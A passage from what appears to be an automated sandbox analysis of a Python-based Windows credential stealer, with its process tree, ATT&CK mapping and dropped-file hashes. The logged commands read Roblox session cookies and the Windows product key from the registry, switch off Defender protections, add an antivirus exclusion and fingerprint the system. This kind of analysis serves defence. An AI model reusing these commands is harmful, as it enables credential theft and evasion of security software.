      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1508
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1476
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub.exe'
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4568

C:\Windows\system32\tree.com
tree /A /F
1⤵
PID:1252

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
1⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
PID:1324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
430e6c691957ab3b0275d63f96131ce4

SHA1
b4fc42632e1a214b95c330bfc1ffdacad9c104b7

SHA256
cffe810cf3fcc1cc75e1cb8fa3b0a6666f674cc35fce9a3e502bea1974b0d859

SHA512
9a3b52b6448f633a6d84f4c4205ab3bb49447cd8704d649b855c344c8a05e3e29bdbe6023246c88012351f70a07aeac00b054583ee287e2aeb6d4627fc15a2df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ac871344dc49ae49f13f0f88acb4868

SHA1
5a073862375c7e79255bb0eab32c635b57a77f98

SHA256
688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

SHA512
ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
daceebb48517863faec5df875f734b07

SHA1
869df175e4f9092382c14027b277626a4e586499

SHA256
2380a99bd80c88331678b8c91296077ee4ef360ca87058c5bd34486226fd84b1

SHA512
711674f8ac349f8841aaec91f3013bb43f8a85f9fa74fd606bb0d70feb5dac6a554792a2ebadcca6978af2da308430f44a545a37722851674449d433b25d9273

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
894afb4ff3cd7ee1f69400e936f8fc9d

SHA1
aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

SHA256
20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

SHA512
449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

Download Submit
C:\Users\Admin\AppData\Local\Temp\1pw4yftp\1pw4yftp.dll

Filesize
4KB

MD5
66214c68c87cf358de2007ae3ba5ee5e

SHA1
d3a204159e415a8e219f3c1ae7f76a9e16dea0f9

SHA256
7c122d2ecd34e6622538d93eee032dc1cfd215c4fc01cea3cf061333cc073083

SHA512
723190198bb9bc3edf22c5a1ec52b23cabce1e773e276808f7e5a22a1da43984b5e59c1301641c8dfe612886d454a4d4a4ee64d8ffd8f01cda01d0bd98791a94

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES366D.tmp

Filesize
1KB

MD5
b7f79979f0844a1ecf88012a2b6882ca

SHA1
b3bf507ad35fac64c3da96df38f738a0491f48fa

SHA256
b3b41ed11680285ddcce78d9e314817add26fc98853c526c1c5fc56ae40244d8

SHA512
57e52a8fbe7a3dac86cca48da7d0f9ca131703b482055c9828978cc44a689a6a8254dc0609bea9c1c0f6b553b550b40adf40fb208ac7ce028674e9ef9b1a1455

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_bz2.pyd

Filesize
82KB

MD5
90f58f625a6655f80c35532a087a0319

SHA1
d4a7834201bd796dc786b0eb923f8ec5d60f719b

SHA256
bd8621fcc901fa1de3961d93184f61ea71068c436794af2a4449738ccf949946

SHA512
b5bb1ecc195700ad7bea5b025503edd3770b1f845f9beee4b067235c4e63496d6e0b19bdd2a42a1b6591d1131a2dc9f627b2ae8036e294300bb6983ecd644dc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_ctypes.pyd

Filesize
122KB

MD5
452305c8c5fda12f082834c3120db10a

SHA1
9bab7b3fd85b3c0f2bedc3c5adb68b2579daa6e7

SHA256
543ce9d6dc3693362271a2c6e7d7fc07ad75327e0b0322301dd29886467b0b0e

SHA512
3d52afdbc8da74262475abc8f81415a0c368be70dbf5b2bd87c9c29ca3d14c44770a5b8b2e7c082f3ece0fd2ba1f98348a04b106a48d479fa6bd062712be8f7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_decimal.pyd

Filesize
149KB

MD5
de9153449d6e2a76b121f4ec9f75e368

SHA1
5909e3e8ff857183aaae1729a8450a9fe08be60a

SHA256
7fca4df177f0f2a8cbe0aa71284e0f5937a9671bc60a291ac0cf611c2b4ab0e7

SHA512
003e772e030ccd7facf98514d775dd58400ae7a01d01d2bb32d25292251d610598dd1c2c9f0bc8ce2509069ed705887051fedb9630ac8267f45c1e61092975de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_hashlib.pyd

Filesize
64KB

MD5
8baeb2bd6e52ba38f445ef71ef43a6b8

SHA1
4132f9cd06343ef8b5b60dc8a62be049aa3270c2

SHA256
6c50c9801a5caf0bb52b384f9a0d5a4aa182ca835f293a39e8999cf6edf2f087

SHA512
804a4e19ea622646cea9e0f8c1e284b7f2d02f3620199fa6930dbdadc654fa137c1e12757f87c3a1a71ceff9244aa2f598ee70d345469ca32a0400563fe3aa65

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_lzma.pyd

Filesize
155KB

MD5
cf8de1137f36141afd9ff7c52a3264ee

SHA1
afde95a1d7a545d913387624ef48c60f23cf4a3f

SHA256
22d10e2d6ad3e3ed3c49eb79ab69a81aaa9d16aeca7f948da2fe80877f106c16

SHA512
821985ff5bc421bd16b2fa5f77f1f4bf8472d0d1564bc5768e4dbe866ec52865a98356bb3ef23a380058acd0a25cd5a40a1e0dae479f15863e48c4482c89a03f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_queue.pyd

Filesize
31KB

MD5
5aa4b057ba2331eed6b4b30f4b3e0d52

SHA1
6b9db113c2882743984c3d8b70ec49fc4a136c23

SHA256
d43dca0e00c3c11329b68177e967cf5240495c4786f5afa76ac4f267c3a5cdb9

SHA512
aa5aa3285ea5c177eca055949c5f550dbd2d2699202a29efe2077213cbc95fff2a36d99eecce249ac04d95baf149b3d8c557a67fc39ead3229f0b329e83447b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_socket.pyd

Filesize
81KB

MD5
439b3ad279befa65bb40ecebddd6228b

SHA1
d3ea91ae7cad9e1ebec11c5d0517132bbc14491e

SHA256
24017d664af20ee3b89514539345caac83eca34825fcf066a23e8a4c99f73e6d

SHA512
a335e1963bb21b34b21aef6b0b14ba8908a5343b88f65294618e029e3d4d0143ea978a5fd76d2df13a918ffab1e2d7143f5a1a91a35e0cc1145809b15af273bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_sqlite3.pyd

Filesize
121KB

MD5
de8b1c6df3ed65d3c96c7c30e0a52262

SHA1
8dd69e3506c047b43d7c80cdb38a73a44fd9d727

SHA256
f3ca1d6b1ab8bb8d6f35a24fc602165e6995e371226e98ffeeed2eeec253c9df

SHA512
a532ef79623beb1195f20537b3c2288a6b922f8e9b6d171ef96090e4cc00e754a129754c19f4d9d5e4b701bcff59e63779656aa559d117ef10590cfafc7404bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_ssl.pyd

Filesize
169KB

MD5
d98a193f531ff307bcdafc7a23aaecc7

SHA1
c00dee4d5b7b72e19423d558ba3f7a7754670ac6

SHA256
2d53264ed7234e519f8aeec58732b2e68a6199d5b6edd0481f76e96ba58cfd3f

SHA512
7192664b4fce00f16ef88f43525056974dea621637fb2e4550ce1555ec86b03510e51d4644dc7b883ab9ded70e5e17ce5c3769e873ce1c2498635552b7baad1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\_ssl.pyd

Filesize
173KB

MD5
6774d6fb8b9e7025254148dc32c49f47

SHA1
212e232da95ec8473eb0304cf89a5baf29020137

SHA256
2b6f1b1ac47cb7878b62e8d6bb587052f86ca8145b05a261e855305b9ca3d36c

SHA512
5d9247dce96599160045962af86fc9e5439f66a7e8d15d1d00726ec1b3b49d9dd172d667380d644d05cb18e45a5419c2594b4bcf5a16ea01542ae4d7d9a05c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\base_library.zip

Filesize
462KB

MD5
87c387d8e0b631c82f6248f2690aa6d6

SHA1
36bdf7df550d7d7793023f56cfce0dbc09ae1723

SHA256
a86d9d650dbfb13f43b01cfb6043048fa6bdfd0f575341bca9af20c9b09e2e14

SHA512
520558b518bacbeeabc19f369f2956eebb3035989b2c91bb5389c34853c4d079367b60292210bc96f02f3e09b9eb0cb8bec78717f42aeac6a2df4830cc6a3665

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libcrypto-3.dll

Filesize
361KB

MD5
392820ba351bc7b537a1efff1ba8a491

SHA1
13bf52ff1e8be7fd3a3347e0472ab6898c7ab891

SHA256
4171d65da4e5fa3d1cfd2e0a4b1c340f5cb8b9cbaa528a6b4df6d683cc6e3b98

SHA512
83d86f1ea8376f287509706d2de8093149b35ae68d2e7a42490764c083318ac7ecd8baa1ca36de535beeaf7ee4a26094b62691cf15b370f6d6e29e69b97c0674

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libcrypto-3.dll

Filesize
28KB

MD5
fd6e6d1aca905704182bcff1a3c572e2

SHA1
cf9971558d6dcea133dd08d6c964780039d286eb

SHA256
43013947b35d8b274fedd7c84497c82ce0dd65670bf86506ecfddc19a80af02a

SHA512
0e494712d4b69cb0813d77bef7b987f3394c51777053cbe7b7d4559820f1b34b9cdf78a0be3bcb173df8259c5bfcfee75e8c766e3093288817b0b10bd9554866

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libcrypto-3.dll

Filesize
101KB

MD5
bdb079c62529b36b08f9953966bf8fa5

SHA1
5f2e3eb640778e0e27342924633d4b5cc0a055fb

SHA256
2b32e9b7e7fb547ca4dd595c0b683d740ce77b38860fa6854688589912fe2c12

SHA512
5d350e5a2016936c69c23c0110c679507f315457c09373e22a23a2dbcdb2e6b4771520d04c918e8176ac94370567ab123c724d7a181c2540cafc4a5f6332077b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libssl-3.dll

Filesize
374KB

MD5
773610377fbd180ba01929d71ad1302a

SHA1
9370f74a636fbc7bd7cd3a45db8e7a0afcc0fe7f

SHA256
5a3314b050e5b76bdc789c31d5b1b0199c0efda0eef9d4439f7dc47cecf238ce

SHA512
16bce25bac8d40c75d44eb77bbdf759a921411c7161dc0baa6ae5fadbd9f69139441c3317f0a3e89435ee8f7e0634f76d9768ace3d66ad974584efc40f99ec36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\libssl-3.dll

Filesize
99KB

MD5
16320b68cc2f22e45266482fbade929e

SHA1
3d93e5b7d2a9dba4a8abe85fc9f00c1277d1606a

SHA256
ddd50e0ffa775ea6238b8bb957b5fa0059aa3f366cf956d724be08ad98a46804

SHA512
280037a74a2b90a2cb5f3d6676850658fa695cabd2e0aeb7453471f3e9dd0f9b171f3fa9225dbe98d69c47d048ca9accc985349495eea502b3af3f685e6656d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\python312.dll

Filesize
3.0MB

MD5
1f54ace7dd583f908ad9476051e1ae95

SHA1
12b1f9388ffc66dd9b39ee950a6ce21d0396d998

SHA256
fa41995affe9ab75b6fc8cc0564cae4b1d78e0a0fbbec81e24c16e90577c5a65

SHA512
b9022d317617511be19339b300b3b83f36bb41a0e6f25212c34bbf8ab2a52b94fadad61c97213466f1d8d462ede5dd03b8ab07941b1c868651447907f0500952

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\python312.dll

Filesize
808KB

MD5
61c5dc1beec7385c656b54053519da5a

SHA1
387724e6a6e81289f2a3a51421825c1b4025f582

SHA256
f7fba6f484e1061a503e6870d530bdf52501d6a38ce9729a9f15376004df24d1

SHA512
0e9c3d2df95546b8ad109812daeae9a2dfe01c7302c94e68a056c9db58fd0bff0568208285a2bccc43e2074338df1e1f34e15dec54c33f6b31c7459b29aa9ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\select.pyd

Filesize
29KB

MD5
e1604afe8244e1ce4c316c64ea3aa173

SHA1
99704d2c0fa2687997381b65ff3b1b7194220a73

SHA256
74cca85600e7c17ea6532b54842e26d3cae9181287cdf5a4a3c50af4dab785e5

SHA512
7bf35b1a9da9f1660f238c2959b3693b7d9d2da40cf42c6f9eba2164b73047340d0adff8995049a2fe14e149eba05a5974eee153badd9e8450f961207f0b3d42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\sqlite3.dll

Filesize
232KB

MD5
b737b82ee366f8cf12dc9809ecd0e850

SHA1
4b520c40f139f82d56f1c708dc10b90e49469b70

SHA256
782302036845e5e473e6a693cc877629f889237dcb2fae36ed6c38423914c5a2

SHA512
d017910096d4135ed8d28373e3962fb49fec42d0e239be70d5479ce96f3fd08b6290020d737913036f9612a1d00459688ff45e547a2f5e34c4fb57afe129bb72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\sqlite3.dll

Filesize
107KB

MD5
b61e7e29b5d4cfe93d30fb23461c7586

SHA1
6718bc26cf66a9ff8d2e2de730e615edbbba8408

SHA256
8ee6fb4f8b454e359f8296dbb57507d084225133678fbb730278307bf81dd28b

SHA512
3e945d3b63aa6a56c86b39793713775d87491d544f667251cdbc5cc5bf4c6b5a93509d36002589dcc7b65a28af3078be13cb96a2fcbafce48b51a477b397a657

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\unicodedata.pyd

Filesize
259KB

MD5
0bccb046d4f983648a586f5b3da37150

SHA1
1b74ea7b95ad926e0979cfe4b63f6722d9857335

SHA256
ed33468893ee9fd222aa9fbb0d4cf39b6b543b0c75fc5cea4e43f5fdc2a8d8ee

SHA512
6dbaae24166628d20adf2e25152ecc588fb9a60a1342d573e21e29d2dba89f07d819526dff62750060c554ae9f9da6ac4ee72637c0d85f7c85f8f8a4a1f7e990

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI13402\unicodedata.pyd

Filesize
1.1MB

MD5
fc47b9e23ddf2c128e3569a622868dbe

SHA1
2814643b70847b496cbda990f6442d8ff4f0cb09

SHA256
2a50d629895a05b10a262acf333e7a4a31db5cb035b70d14d1a4be1c3e27d309

SHA512
7c08683820498fdff5f1703db4ad94ad15f2aa877d044eddc4b54d90e7dc162f48b22828cd577c9bb1b56f7c11f777f9785a9da1867bf8c0f2b6e75dc57c3f53

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnrdvml4.mwt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Desktop\JoinUninstall.txt

Filesize
88KB

MD5
9964103fa8b05dabb48608ae1748f078

SHA1
55c3b620cfb99073e8fa18f4fe6b76e6fbbc76c3

SHA256
288937442bdba3fea4b7e2b9533ba0c5f63b87ffcb2fd9ab45f8195eba09f7cd

SHA512
315688147b853a25319f40e854f32e717388f6d2d5849125e47be1b96ecb5c9ef3d84cf212119d2c6cb4c662b82b96133154ba5c2fb5c501c9323bbac65a6e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Desktop\MergeSend.pdf

Filesize
18KB

MD5
3468de4c8690c15f66b99521987f3017

SHA1
8ec93411e923c0aa94ac817b7e313e921ce4016c

SHA256
64496edaa0a2ac7a6395d0a1f18bf99eab2007055b594f35696237cf49c02012

SHA512
b0c21c55bd1e3bf7dc5c6d07a7d69aa0babf5afafadbd36184289a2e5a783f6512daa61a4a3f378a3682b13146b3d7c244aa548f22dc18165c189dd687d51f94

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Desktop\ReadConvertFrom.jpg

Filesize
2KB

MD5
751c64c75501e1859d77eccb6cba758b

SHA1
8db53322b53350e188229d0b1996a8e0c4eb3ad6

SHA256
9d4ec0d6bc0ffd9d1b5c164d127f7b5e5b01f434fae8905ce8f619c84c6429ee

SHA512
914793a5326aefe5c83b1aa70ad015bb71f143cd691a7bc186d53b94eb11a5ae7f39be7de9fd2bd8725199cf2b5b42b3963e539da59dd7dc47bdf615c8f0cd32

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Documents\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Documents\Files.docx

Filesize
11KB

MD5
4a8fbd593a733fc669169d614021185b

SHA1
166e66575715d4c52bcb471c09bdbc5a9bb2f615

SHA256
714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42

SHA512
6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Documents\Opened.docx

Filesize
11KB

MD5
bfbc1a403197ac8cfc95638c2da2cf0e

SHA1
634658f4dd9747e87fa540f5ba47e218acfc8af2

SHA256
272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6

SHA512
b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Documents\These.docx

Filesize
1KB

MD5
64d43c55cca6b0ed126739c87e9bc220

SHA1
a0e9c9ba2e238423dea709ee346de2184eb5b9dc

SHA256
d57a785680d54b9634c0d27d0a93a0b847ba0c997a2bc5e4dc12a8d5f41e447d

SHA512
d79e4b6d1b9b20ec7bb831c718e71ec64dc66e3ade9451b5183e37db9d37aeb2158cd9a0dca4150e397cf297eb8bee6d05dfbdcb0cd39e9ebd19715b512e2d5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Downloads\CompareBackup.lock

Filesize
47KB

MD5
9613c159ce43cc165f28efbccd675f9a

SHA1
9e41b9edfab2974af32b82936d32907d6b25c964

SHA256
f64a86336432c44debb9462fbe73d6574006e0a04dd30d29dc956a7b987fce34

SHA512
c3c18abc504e1569447523ea06424d646499f0dbccd92782559772d878c149608ddaa8b5cbc356defdb712a0190ce50f7a314ebc0e0809dc2e58326ca73e7503

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Pictures\My Wallpaper.jpg

Filesize
21KB

MD5
12e578e59772def954a84031326d3c21

SHA1
551137d54394f2e82381b0c13d7238e116a8903a

SHA256
8f7c3df157cb2e7cf8a915d46b660ba661d520b6d0338caf83d85e30aef8d049

SHA512
1f1a8638e935287dc41b27202ea7a782f920e5451842c68063958d3af9fdd92aac95dc20af5fa9d351337439a55df8d41aaf370ef426802196860c25785d3721

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Pictures\OpenRemove.png

Filesize
1KB

MD5
1ebce3e5f8225fd2987a4943656a5eaf

SHA1
eb0f6a9bd9f74cc2805338ebb22993f1e44df699

SHA256
e0c09eddf2d703d9c55ec9807823f7268e9bcf5f3e6d33dc7710c28390aac771

SHA512
50d7735714b293963adfece69ca28fc4ff83f8d3d924b6fbedd3a5fbdfee86cc054ed86014eb829c9ff6961f5dfc63b461e4f9e9e3244301963ff1e72debfe8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Pictures\RestartRequest.png

Filesize
55KB

MD5
c53a79a2870c5fc53a5aa7b926763c07

SHA1
89459a6a27e8eb8131e331c65f0e0201e149cc6e

SHA256
51c86f5bdc60463dd1ec16d6eae18ec1a40b2d174c67998fafc6e17ea32c10a4

SHA512
47191cc7948d366f785f4278a76bbc629553797db0c2b3e364ab89a109cf1169c2c6bf9dd742d55160ee41aa5418a2c678a98a22f0e9b8ca4c4f976269fd57ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Common Files\Pictures\WaitSuspend.png

Filesize
231KB

MD5
30992369ae7a8549fafca705d0d0c5ac

SHA1
f9013cc81be1f596329d78569010836a7042ecc4

SHA256
6cdaf1a3c0e0d94bf81a290a96c1a196f6ac0a576a6bb07858e04beab207fabe

SHA512
ef9c2799da0c2e2b6c3404866e2a2c974c40175fce4fd21845658ad2841a8624fd9fad2f0533135b8fcca1e3cff61bdb46fb6f499af553ed7342cadd6086d83e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‎\Display (1).png

Filesize
32KB

MD5
382e89460395e7daf9f081f811ace0fc

SHA1
3172f53e711ff3733da7e0f83d744b156a03a7e3

SHA256
780ac9cdb350c0050f30a943079cecce393be461ea6e3aa12b51591cc2feca1b

SHA512
afe35da758096de29ce2aa6c0aeb9969f1e350cd8f9f2b2386e7b1517b1e6026d189cfc7576eb9888d20d09f958287f4944f8440e67b8c033e712164e138ebd2

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1pw4yftp\1pw4yftp.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
